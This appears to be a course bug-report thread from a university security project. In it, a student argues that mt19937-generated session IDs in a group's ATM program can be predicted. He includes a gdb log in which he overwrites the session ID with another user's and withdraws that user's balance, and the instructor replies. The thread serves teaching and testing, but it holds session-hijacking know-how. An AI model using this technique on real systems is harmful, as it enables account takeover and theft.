[Security BUG] Possible attack on guessing the session id - Group 1

[RuchitJagodara]

Here, Group 1 has implemented a session id functionality, which helps them to keep track of login credentials from one atm machine. But here in their code, I noticed that they were using pseudo random number generator (specifically mt19937) for generating the session id, and as I showed in my previous two issues on group 1 we can actually manipulate some data using bit exploitation and variable is one of them so, here as you can see from below article

Link :- https://www.sciencedirect.com/topics/computer-science/mersenne-twister#:~:text=The%20strength%20of%20MT19937%20also,in%20624%2032%2Dbit%20values.

Here, as you can see if I am able to find sequence of 624 generated numbers then I can reverse-engineer backward and forward predictions also, and note that they are storing the session_id until when a user log out, so here a user let's say Prof. Bichhawat has logged in to the platform, and then I log in and generate next 624 sessions then, I can reverse engineer the process and can predict the session_id of Prof. Bichhawat and then I can manipulate the value of session_id on the client end, and then whenever I send any request my session_id will remain same as Prof. Bichhawat's, So basically I have disguised as Prof. Bichhawat.

So as I have all privileges of Prof. Bichhawat's account, I can actually withdraw 2 crore INR from Prof. Bichhawat's Account 🤑. And nobody knows who actually withdrawed that amount 😁.

So I think this could be a potential :bug:

[RuchitJagodara]

And this is also a very good technique which, generally, red coders (of competitive programming) use during the hacking phase of competitive programming contests !

[RuchitJagodara]

This is also a very good Machine Learning based approach for cracking the mt19937 generator, LINK

[Jiya-desai]

I noticed that our source code was inspected to review how we implemented the session ID generation functionality. I wanted to clarify whether reviewing the source code itself to find potential vulnerabilities in our implementation is part of the intended approach for the breaking phase. Running the executables and attempting to actually crack session IDs would definitely count as a major weakness. However, examining the internal implementation and assessing the strength of the session ID generation seems a bit different in scope. @bichhawat Sir, may you please clarify if this is allowed?

[bichhawat]

@RuchitJagodara you will need to perform the attack to show the weakness in the code. If you can do that, we will mark it as a bug.

P.S. provide more realistic numbers (like thousands) for my account balance! I'd have retreated to the mountains if the initial balance was true to the number you used as an example. :)

[RuchitJagodara]

Here, below is a bank print statements

Below, is when Prof. Bichhawat logged in to his account.

Here, note that before the operation 1. i.e. check_balance that Prof. Bicchawat performed, I performed the attack from my account, disguising myself as Prof. Bicchwat.

As you can see, first Prof. Bicchawat initialised his account with 100000.00 INR but without performing any operation when he checked his balance it was 0.00 !

Below is my attack log,

ruchitjagodara@ruchitjagodara:~/Education/CNS/project-cns/project-submissions/group-1/build/requirements$ gdb atm
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from atm...
(gdb) break atm_final.cpp:446
Breakpoint 1 at 0x8c1d: file atm_final.cpp, line 446.
(gdb) run
Starting program: /home/ruchitjagodara/Education/CNS/project-cns/project-submissions/group-1/build/requirements/atm 

This GDB supports auto-downloading debuginfo from the following URLs:
  <https://debuginfod.ubuntu.com>
Enable debuginfod for this session? (y or [n]) y
Debuginfod has been enabled.
To make this setting permanent, add 'set debuginfod enabled on' to .gdbinit.
2[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Server: VERIFIED
ATM Menu:
1. Register
2. Login
3. Exit
Enter your choice: 2
Invalid choice.
ATM Menu:
1. Register
2. Login
3. Exit
Enter your choice: 2
Enter username (allowed: [_-., digits, lowercase letters], 1-122 chars): ruchitjagodara
Enter password: IrememberPass@123
Server: Login successful! SessionID: DUPGSZIOISPWYUBZ

Breakpoint 1, main () at atm_final.cpp:446
warning: Source file is more recent than executable.
446                     int command_counter = 0;     // Initialize command counter
(gdb) set session_id = JADIGALLNLFLXVWC
No symbol "JADIGALLNLFLXVWC" in current context.
(gdb) set session_id = "JADIGALLNLFLXVWC"
Invalid cast.
(gdb) set session_id = std::string("JADIGALLNLFLXVWC")
A syntax error in expression, near `("JADIGALLNLFLXVWC")'.
(gdb) call session_id = std::string("JADIGALLNLFLXVWC")
A syntax error in expression, near `("JADIGALLNLFLXVWC")'.
(gdb) call session_id = "JADIGALLNLFLXVWC"
Invalid cast.
(gdb) set var session_id = "JADIGALLNLFLXVWC"
Invalid cast.
(gdb) call session_id.assign("JADIGALLNLFLXVWC")
$1 = "JADIGALLNLFLXVWC"
(gdb) continue
Continuing.

Logged in. What would you like to do?
1. Check Balance
2. Deposit Money
3. Withdraw Money
4. View past transactions
5. Logout
Enter your choice: 1
Server: Current balance: $100000.00

Logged in. What would you like to do?
1. Check Balance
2. Deposit Money
3. Withdraw Money
4. View past transactions
5. Logout
Enter your choice: 3
Enter amount to withdraw: 100000.00
Server: Withdrew $100000.00. New balance: $0.00

Logged in. What would you like to do?
1. Check Balance
2. Deposit Money
3. Withdraw Money
4. View past transactions
5. Logout
Enter your choice: 

Here, I was able to disguise myself and able to withdraw 100000 INR from Prof. Bichhawat's account.

P.S. How about a few lakhs instead of a couple of crores? After all, I wouldn't want to make you retreat to the mountains too soon! 🏞️ (Though, I do hear the mountains are great for debugging without distractions!) :smiley:

[RuchitJagodara]

Please note that I used the session ID directly. As shown in the LINK, we can find the session ID because it is generated by mt19937. However, I am no a red coder (but a blue one !), so it is a skill issue for me 🥲, especially since it involves machine learning techniques, which I find quite challenging. 😔

[bichhawat]

Thanks for the detailed explanation and the more realistic balance assumptions (Hobbiton is also, seemingly, great) .

However, without the attack, I cannot ask the group to fix this.

[RuchitJagodara]

Sir, I agree I was not able to perform the guessing part because of lack of knowledge of machine learning. But regarding the session token guessing, I provided the necessary resources. Since courses like Machine Learning or others are not listed as prerequisites for this course, having knowledge of those should not be mandatory, correct? As for the hacking part, I have demonstrated the attack using CNS concepts and showcased my understanding of the possible vulnerabilities when grp uses mt19937. Therefore, I believe I possess the required knowledge to execute the attack effectively. However, the lack of Machine Learning knowledge should not be a point of consideration, right?

[bichhawat]

I agree but many attacks have been shown to be theoretically possible but may not be successfully performed always, which is the reason for my argument.